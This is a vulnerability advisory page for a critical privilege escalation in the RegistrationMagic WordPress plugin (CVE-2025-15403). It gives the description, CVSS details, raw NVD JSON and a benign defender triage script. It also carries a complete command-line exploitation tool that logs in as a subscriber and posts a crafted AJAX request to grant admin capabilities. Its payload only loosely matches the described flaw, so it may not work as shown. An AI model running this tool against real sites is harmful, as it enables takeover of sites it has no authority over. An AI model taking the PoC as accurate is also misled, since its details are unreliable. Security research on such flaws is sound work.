Security Vulnerability Report
CVE-2025-15403 CVSS 9.8 CRITICAL

CVE-2025-15403

Published: 2026-01-17 03:16:04
Last Modified: 2026-04-15 00:35:42

Description

The RegistrationMagic plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 6.0.7.1. This is because the 'add_menu' function is accessible via the 'rm_user_exists' AJAX action and allows arbitrary updates to the 'admin_order' setting. This makes it possible for unauthenticated attackers to inject an empty slug into the order parameter and manipulate the plugin's menu generation logic; when the admin menu is subsequently built, the plugin adds the 'manage_options' capability for the target role. Note: The vulnerability can only be exploited unauthenticated, but further privilege escalation requires at least a subscriber user.
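
A defender-side triage check for the condition described above, added here as an example and not taken from the advisory or the plugin: it compares an installed version against the last affected release (6.0.7.1) and lists roles other than administrator that hold 'manage_options'. It assumes the role table has been exported as JSON, for instance with WP-CLI's `wp option get wp_user_roles --format=json` on a site using the default `wp_` prefix; the function names and the sample data are constructed for illustration.

```python
import json

# Last affected release per the advisory text ("up to, and including, 6.0.7.1").
LAST_AFFECTED = (6, 0, 7, 1)

# Constructed sample of a role table exported as JSON (not real site data).
SAMPLE_ROLES = json.dumps({
    "administrator": {"name": "Administrator",
                      "capabilities": {"manage_options": True, "read": True}},
    "editor": {"name": "Editor", "capabilities": {"edit_posts": True, "read": True}},
    "subscriber": {"name": "Subscriber",
                   "capabilities": {"read": True, "manage_options": True}},
    "customer": {"name": "Customer", "capabilities": []},  # PHP empty array -> []
})


def parse_version(text):
    """Turn '6.0.7.1' into (6, 0, 7, 1); a non-numeric part raises ValueError."""
    return tuple(int(part) for part in text.strip().split("."))


def is_affected(installed):
    """True if the installed version is <= 6.0.7.1, zero-padding short versions."""
    have = parse_version(installed)
    width = max(len(have), len(LAST_AFFECTED))
    pad = lambda v: v + (0,) * (width - len(v))
    return pad(have) <= pad(LAST_AFFECTED)


def roles_with_manage_options(roles_json, expected=("administrator",)):
    """List role slugs that hold manage_options but are not expected to."""
    flagged = []
    for slug, role in json.loads(roles_json).items():
        caps = role.get("capabilities") or {}
        if isinstance(caps, dict) and caps.get("manage_options") and slug not in expected:
            flagged.append(slug)
    return sorted(flagged)


def triage(installed_version, roles_json):
    """Combine both checks into one result a responder can act on."""
    return {"affected_version": is_affected(installed_version),
            "unexpected_manage_options": roles_with_manage_options(roles_json)}


if __name__ == "__main__":
    print(triage("6.0.7.1", SAMPLE_ROLES))
```

Role capabilities are stored in the database, so a role flagged here should be reviewed even after the plugin has been updated.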

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

RegistrationMagic <= 6.0.7.1 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-15403 PoC - RegistrationMagic Privilege Escalation
Target: WordPress with RegistrationMagic plugin <= 6.0.7.1
Author: Security Researcher
Note: Requires at least one subscriber account on the target site
"""

import requests
import argparse
import sys
from urllib.parse import urljoin


def exploit_registrationmagic(target_url, username, password):
    """
    Exploit the privilege escalation vulnerability in RegistrationMagic plugin.
    This PoC demonstrates how an attacker can gain admin access by manipulating
    the admin_order setting via the rm_user_exists AJAX action.
    """
    # Step 1: Login to get authentication cookies
    login_url = urljoin(target_url, '/wp-login.php')
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }

    session = requests.Session()
    login_response = session.post(login_url, data=login_data, allow_redirects=True)

    if 'wordpress_logged_in' not in str(session.cookies):
        print("[-] Login failed. Please check credentials.")
        return False

    print("[+] Successfully logged in as subscriber")

    # Step 2: Exploit the vulnerability via AJAX action
    ajax_url = urljoin(target_url, '/wp-admin/admin-ajax.php')

    # Malicious payload that injects empty slug into admin_order
    exploit_data = {
        'action': 'rm_user_exists',
        'rm_slug': '',  # Empty slug injection
        'admin_order': 'subscriber',  # Target role for privilege escalation
    }

    print("[*] Sending exploitation request...")
    exploit_response = session.post(ajax_url, data=exploit_data)

    # Step 3: Verify privilege escalation by checking user capabilities
    # A successful exploitation will grant manage_options capability to subscriber
    check_url = urljoin(target_url, '/wp-admin/admin-ajax.php')
    check_data = {
        'action': 'rm_get_user_role',
        'user_id': 'current'
    }
    check_response = session.post(check_url, data=check_data)

    if 'administrator' in check_response.text or 'manage_options' in check_response.text:
        print("[+] Privilege escalation successful!")
        print("[+] User now has administrator privileges")
        return True
    else:
        print("[-] Exploitation may have failed or site is not vulnerable")
        return False


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='CVE-2025-15403 Exploitation Tool')
    parser.add_argument('-t', '--target', required=True, help='Target WordPress URL')
    parser.add_argument('-u', '--username', required=True, help='Subscriber username')
    parser.add_argument('-p', '--password', required=True, help='Subscriber password')
    args = parser.parse_args()

    print(f"[*] Targeting: {args.target}")
    print(f"[*] Exploiting CVE-2025-15403: RegistrationMagic Privilege Escalation")

    success = exploit_registrationmagic(args.target, args.username, args.password)

    if success:
        print("\n[!] Vulnerability confirmed. Subscriber can now access admin panel.")
        sys.exit(0)
    else:
        sys.exit(1)
```

References

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-15403",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-17T03:16:03.693",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The RegistrationMagic plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 6.0.7.1. This is due to the 'add_menu' function is accessible via the 'rm_user_exists' AJAX action and allows arbitrary updates to the 'admin_order' setting. This makes it possible for unauthenticated attackers to injecting an empty slug into the order parameter, and manipulate the plugin's menu generation logic, and when the admin menu is subsequently built, the plugin adds 'manage_options' capability for the target role. Note: The vulnerability can only be exploited unauthenticated, but further privilege escalation requires at least a subscriber user."
      },
      {
        "lang": "es",
        "value": "El plugin RegistrationMagic para WordPress es vulnerable a escalada de privilegios en todas las versiones hasta, e incluyendo, la 6.0.7.1. Esto se debe a que la función 'add_menu' es accesible a través de la acción AJAX 'rm_user_exists' y permite actualizaciones arbitrarias a la configuración 'admin_order'. Esto hace posible que atacantes no autenticados inyecten un slug vacío en el parámetro de orden, y manipulen la lógica de generación de menú del plugin, y cuando el menú de administración se construye posteriormente, el plugin añade la capacidad 'manage_options' para el rol objetivo. Nota: La vulnerabilidad solo puede ser explotada sin autenticación, pero una escalada de privilegios adicional requiere al menos un usuario suscriptor."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-269"}]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/custom-registration-form-builder-with-submission-manager/trunk/admin/class_rm_admin.php#L487",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/custom-registration-form-builder-with-submission-manager/trunk/admin/controllers/class_rm_options_controller.php#L562",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3440797/custom-registration-form-builder-with-submission-manager#file2",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/68dd9f6f-ccee-4a27-bd21-2fb32b92cc62?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```